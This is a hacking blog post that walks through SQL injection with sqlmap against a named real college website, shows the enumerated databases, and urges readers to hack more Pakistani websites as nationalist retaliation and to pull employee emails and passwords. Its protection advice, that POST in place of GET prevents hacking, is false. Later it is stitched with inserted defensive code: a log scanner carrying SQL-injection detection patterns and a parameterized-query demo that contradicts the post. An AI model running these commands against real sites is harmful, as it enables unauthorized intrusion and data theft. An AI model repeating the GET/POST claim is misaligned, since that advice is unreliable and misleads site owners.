
Website Hacking | TechnoGb


Websites have become one of the major ways of spreading knowledge, advertising products, providing entertainment, and almost everything else. So for anyone who wants to promote their products, talents, or knowledge, the first thing that comes to mind is to build a website for it and publish their work there.

But building a website is not enough on its own. What keeps it working is the security and maintenance of the server behind it.

And here lies the dark reality of the internet and of the servers holding the websites of all those individuals who set out to advertise their work online: most of these websites are vulnerable and can be taken down by any HACKER (that is, anyone who understands how websites and servers work and how to find their vulnerabilities).

So, here are a few methods of hacking websites:

1. SQL-Injection
2. DoS Attack (Denial of Service Attack)
3. D-DoS Attack (Distributed Denial of Service Attack)
4. Cross-Site Scripting Attacks
5. ClickJacking Attacks
6. Social Engineering Attacks
7. Phishing Attacks
8. DNS Cache Poisoning Attacks

And many more methods…

So, here I am going to discuss the SQL-Injection attack…

The prerequisites for this attack are :

* KALI LINUX (operating system)
{can be downloaded from www.kali.org}

* A vulnerable website or a server
{if you don’t know how to find the vulnerable website you can visit my Blog from Here}

* And some patience to perform the attack (because hacking needs lots of patience and time)

Now let’s begin our work of hacking a website:

Here I have taken a Pakistani Website ( http://www.citicollege.edu.pk ) to knock it down and i request all of you to hack more and more amount of Pakistani Websites and post them on your Social Media Websites along with #packyou label…To teach pakistani’s a lesson over the internet so, they don’t dare to take down Indian websites.

 

 

STEP 1 :
—————

Fire up your KALI LINUX (penetration testing operating system) system and open a terminal in it.

Now type “sqlmap -h” (without quotes) to open the SQLMAP help page in the terminal, which will guide us in the later steps.

 


 

STEP 2:
————-

The next step is to perform the injection on our vulnerable website, so we will type the command below:

“sqlmap -u http://www.citicollege.edu.pk –level=5 –risk=3 –dbs”

Now let’s understand the above command a little:

“sqlmap” :- this command launches the sqlmap program from the terminal in KALI LINUX.

“-u” :- this argument provides the web address of the target on which we want to perform our SQL injection.

“–level=5” :- this argument specifies the level of the attack we want to run against our target. The right value depends on the situation and the website (you will learn this with experience in the field). The default value is 1 and the maximum is 5.

“–risk=3” :- this argument specifies the amount of risk to be taken by our system in taking down the target website using SQLMAP. Its maximum value is 3, and its default, which is also the minimum, is 1.

“–dbs” :- this argument tells sqlmap to enumerate the databases of the provided website. It is used when we do not yet know the name of any database on the site.

 


 

Here we got the list of all the databases on the website. In this case there are only two:

available databases [2]:
[*] citioffi_college
[*] information_schema

Now we will extract all the information of these two databases in our next step.

 



 

STEP  3 :
—————

To extract the information (tables, columns, and rows) of a particular database we will use the below command :

“sqlmap -u http://www.citicollege.edu.pk -D information_schema –tables”

 


 

Here we got the list of all the tables present in the information_schema database (45 tables).

And if we want to view the contents of any of the tables, we will use the command below:

“sqlmap -u http://www.citicollege.edu.pk -D information_schema -T CHARACTER_SETS –columns –dump”

 


 

In this way, we can find all the information, even the email addresses and passwords of the website's employees, because all of it is stored in the same database as the website. How long it takes to find that vital information in the vulnerable database depends on us.

I am not showing the database containing the email addresses and passwords of the employees of this website because it is illegal to share someone’s personal details publicly. But don’t worry, I have given you the way to hack into the database of any vulnerable website, so you can do so and find all that vital information, but don’t exceed the “CYBER LAW BOUNDARIES”.
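
From the defender's side, a scan like the one in the steps above leaves traces in the web server's access log. The following added example (not part of the original post; the log lines, paths, IP addresses and version string are constructed) flags clients that send sqlmap's default User-Agent or that repeatedly put SQL syntax, including `information_schema` lookups, into request parameters.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined Log Format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# SQL syntax that has no business inside an ordinary request parameter.
SQL_TOKENS = re.compile(
    r"\bunion\b.+\bselect\b|\binformation_schema\b|\bsleep\s*\(|\bor\b\s+\d+\s*=\s*\d+",
    re.IGNORECASE)

def scan(lines, threshold=3):
    """Return {client_ip: [reasons]} for clients that look like automated SQLi probing."""
    sql_hits = defaultdict(int)
    reasons = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip = m.group("ip")
        if "sqlmap" in m.group("ua").lower():
            reasons[ip].add("sqlmap user-agent")
        query = unquote_plus(m.group("url").partition("?")[2])
        if SQL_TOKENS.search(query):
            sql_hits[ip] += 1
            if sql_hits[ip] >= threshold:
                reasons[ip].add("repeated SQL syntax in parameters")
    return {ip: sorted(found) for ip, found in reasons.items()}

def _line(ip, url, ua):
    return f'{ip} - - [01/Jan/2024:00:00:00 +0000] "GET {url} HTTP/1.1" 200 512 "-" "{ua}"'

# Constructed sample log lines (documentation IP ranges, made-up paths and versions).
SAMPLE = [
    _line("198.51.100.7", "/item.php?id=1", "sqlmap/1.0 (https://sqlmap.org)"),
    _line("203.0.113.9", "/item.php?id=1+OR+1%3D1", "Mozilla/5.0"),
    _line("203.0.113.9", "/item.php?id=1%20UNION%20ALL%20SELECT%20NULL", "Mozilla/5.0"),
    _line("203.0.113.9", "/item.php?id=1%20AND%20SLEEP(5)", "Mozilla/5.0"),
    _line("192.0.2.10", "/item.php?id=42", "Mozilla/5.0"),
    _line("192.0.2.10", "/search.php?q=student+union+elections", "Mozilla/5.0"),
]

if __name__ == "__main__":
    for ip, why in scan(SAMPLE).items():
        print(ip, why)
```

The User-Agent is supplied by the client, so treat the parameter check as the signal to rely on and tune `threshold` to your own traffic.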

You can watch my video on ‘WEBSITE HACKING USING KALI LINUX (offensive security)’ which contains all these steps in a very detailed manner from below.



HOW TO PROTECT OUR WEBSITE FROM BEING HACKED

To protect something we first need to understand how it works, so let’s briefly look at how a website works.
A website stored on any server has two parameters placed in it by the developer, the “GET” parameter and the “POST” parameter, which are used to carry the information and content of the website from the server to the Internet and from the Internet to the user’s system. The protection lies in these two parameters only, i.e. the GET and POST parameters.
When the GET parameter is used in a website, all the information the user requests from the server is revealed on the network and in the address bar of the user’s browser. This can turn into a serious information leak for any website, and it is one of many vulnerabilities still present on many websites.
With the POST parameter, all the information the user requests from the server is hidden under the “https” protocol, so this is the method applied on all websites nowadays.
So, to protect your website from being HACKED, stop using the GET parameter and start using the POST parameter in your website’s code. This technique will not guarantee you and your website 100% safety from being hacked, but it will definitely lower the chance of it. Nothing on the Internet is fully secure, so no method will give you 100% safety.
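
Whether a value reaches the server by GET or by POST, SQL injection depends on how the server builds the query from that value. The added example below (not code from the original post; the `staff` table, the `user` parameter and all rows are constructed for illustration) sends the same input by both methods to a string-concatenated lookup and to a parameterized one.

```python
import sqlite3
from urllib.parse import parse_qs, urlencode

def make_db():
    """In-memory table with constructed sample rows (not data from any real site)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE staff (username TEXT PRIMARY KEY, email TEXT)")
    db.executemany("INSERT INTO staff VALUES (?, ?)", [
        ("alice", "alice@example.test"),
        ("bob", "bob@example.test"),
        ("carol", "carol@example.test"),
    ])
    return db

def read_param(method, query_string, body, name):
    """Take the parameter from the URL for GET or from the form body for POST."""
    raw = query_string if method == "GET" else body
    return parse_qs(raw, keep_blank_values=True).get(name, [""])[0]

def lookup_concatenated(db, username):
    # Weak: the value becomes part of the SQL text and is parsed as SQL.
    sql = "SELECT email FROM staff WHERE username = '" + username + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, username):
    # Hardened: the statement is fixed; the value is bound as data only.
    sql = "SELECT email FROM staff WHERE username = ?"
    return [row[0] for row in db.execute(sql, (username,))]

def handle(db, method, lookup, value):
    """Simulate one request carrying `value` in the hypothetical `user` parameter."""
    encoded = urlencode({"user": value})
    query_string, body = (encoded, "") if method == "GET" else ("", encoded)
    return lookup(db, read_param(method, query_string, body, "user"))

# Constructed test input: a textbook tautology string used to exercise the fix.
TAUTOLOGY = "x' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    for method in ("GET", "POST"):
        for lookup in (lookup_concatenated, lookup_parameterized):
            rows = handle(db, method, lookup, TAUTOLOGY)
            print(method, lookup.__name__, len(rows), "row(s) returned")
```

The concatenated lookup returns every row for both methods, while the parameterized lookup returns none, so the fix belongs in the query code rather than in the choice of HTTP method.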
If you have any questions to ask / or any suggestion to give please mention it in the comment box below.

#hack_ethically  #hack_smartly

 
